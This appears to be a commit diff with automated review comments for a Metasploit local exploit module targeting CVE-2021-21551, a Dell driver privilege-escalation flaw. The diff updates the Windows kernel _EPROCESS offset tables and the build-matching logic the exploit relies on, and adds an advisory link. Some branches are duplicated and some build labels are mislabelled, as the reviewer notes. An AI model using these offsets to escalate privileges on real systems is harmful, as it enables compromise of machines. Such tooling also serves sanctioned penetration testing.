Clear up some target offset discrepancies
parent
7d841a0f79
commit
eb89550f85
Binary file not shown.
|
@ -36,35 +36,32 @@ BOOL ResolveRequirements(void) {
|
|||
RtlGetNtVersionNumbers(&dwMajor, &dwMinor, &dwBuild);
|
||||
dwBuild = LOWORD(dwBuild);
|
||||
|
||||
/* Windows 7 SP0 */
|
||||
if ((dwMajor == 6) && (dwMinor == 1) && (dwBuild == 7600)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin7Sp0;
|
||||
}
|
||||
/* Windows 7 SP1 */
|
||||
else if ((dwMajor == 6) && (dwMinor == 1) && (dwBuild == 7601)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin7Sp1;
|
||||
}
|
||||
/* Windows 8.1 */
|
||||
else if ((dwMajor == 6) && (dwMinor == 3) && (dwBuild == 9600)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin8p1;
|
||||
}
|
||||
/* Windows 10 */
|
||||
else if ((dwMajor == 10) && (dwMinor == 0)) {
|
||||
/* older than v1803 */
|
||||
if (dwBuild < 17134) {
|
||||
return FALSE;
|
||||
}
|
||||
/* v1803 - v1909*/
|
||||
else if (dwBuild < 19041) {
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17134)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
|
||||
}
|
||||
/* v2004 - v20H2 */
|
||||
else if (dwBuild < 19043) {
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17763)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 19041)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
|
||||
}
|
||||
else {
|
||||
return FALSE;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else {
|
||||
return FALSE;
|
||||
|
|
|
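Review bot: The `dwBuild == 18362` branch that assigns `&EprocessOffsetsWin10v1903` appears more than once in this section. The page has lost its +/- markers, so some copies may be removed lines, but if two of them are on the new side the later one can never be reached in an else-if chain and should be dropped. The exact-build comparisons ending in `else { return FALSE; }` fail closed on any build without a checked table, which is presumably deliberate, since a wrong offset would address the wrong kernel field. A one-line comment such as `/* unknown build: refuse rather than guess offsets */` on that final branch would record the intent. ResolveRequirements begins and ends outside the hunk.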
@ -37,16 +37,24 @@ typedef struct _EPROCESS_OFFSETS {
|
|||
typedef EPROCESS_OFFSETS* PEPROCESS_OFFSETS;
|
||||
|
||||
#ifdef _WIN64
|
||||
/* Windows 7 SP0 (build 6.1.7600) - https://www.vergiliusproject.com/kernels/x64/Windows%207%20%7C%202008R2/RTM/_EPROCESS */
|
||||
/* Windows 7 SP0 (6.1.7600) - https://www.vergiliusproject.com/kernels/x64/Windows%207%20%7C%202008R2/RTM/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin7Sp0 = { 0x188, 0x208, 0x180 };
|
||||
/* Windows 7 SP1 (build 6.1.7601) - https://www.vergiliusproject.com/kernels/x64/Windows%207%20%7C%202008R2/SP1/_EPROCESS */
|
||||
/* Windows 7 SP1 (6.1.7601) - https://www.vergiliusproject.com/kernels/x64/Windows%207%20%7C%202008R2/SP1/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin7Sp1 = { 0x188, 0x208, 0x180 };
|
||||
/* Windows 8.1 (build: 6.3.9600) - https://www.vergiliusproject.com/kernels/x64/Windows%208.1%20%7C%202012R2/Update%201/_EPROCESS */
|
||||
/* Windows 8.1 (6.3.9600) - https://www.vergiliusproject.com/kernels/x64/Windows%208.1%20%7C%202012R2/Update%201/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin8p1 = { 0x2e8, 0x348, 0x2e0 };
|
||||
/* Windows 10 v1803 - v1909 */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2f0, 0x360, 0x2e8 };
|
||||
/* Windows 10 v2004 - v20H2 */
|
||||
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS*/
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1809 (10.0.17763) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1809%20Redstone%205%20(October%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1809 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1903 (10.0.18362) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1903%2019H1%20(May%202019%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1903 = { 0x2f0, 0x360, 0x2e8 };
|
||||
/* Windows 10 v1909 (10.0.18362) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1909%2019H2%20(November%202019%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1909 = { 0x2f0, 0x360, 0x2e8 };
|
||||
/* Windows 10 v2004 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2004%2020H1%20(May%202020%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v2004 = { 0x448, 0x4b8, 0x440 };
|
||||
/* Windows 10 v2009 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2009%2020H2%20(October%202020%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v2009 = { 0x448, 0x4b8, 0x440 };
|
||||
#endif
|
||||
|
||||
/*
|
||||
|
|
|
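Review bot: The comments on `EprocessOffsetsWin10v1909` and `EprocessOffsetsWin10v2009` give builds 10.0.18362 and 10.0.19041, the same numbers as the v1903 and v2004 entries above them. Windows 10 1909 and 20H2 report builds 18363 and 19042, so these labels look copied and should state the build each table was actually checked against. The v1803 comment also closes without a space (`_EPROCESS*/`), which glues the terminator onto the URL. Separately, `const static` places the storage class after the qualifier, which the C standard marks obsolescent; `static const EPROCESS_OFFSETS ...` is the conventional order for every table in this block.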
@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2021-21551' ],
|
||||
[ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ]
|
||||
[ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ],
|
||||
[ 'URL', 'https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability' ],
|
||||
],
|
||||
'DisclosureDate' => '2021-05-04',
|
||||
'DefaultTarget' => 0,
|
||||
|
|
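Review bot: The Dell advisory URL added to 'References' uses the `ro-ro` locale path, so readers following the remediation link land on the Romanian page. Using the `en-us` form of the same advisory (`.../support/kbdoc/en-us/000186019/...`) would match the language of the rest of the module metadata.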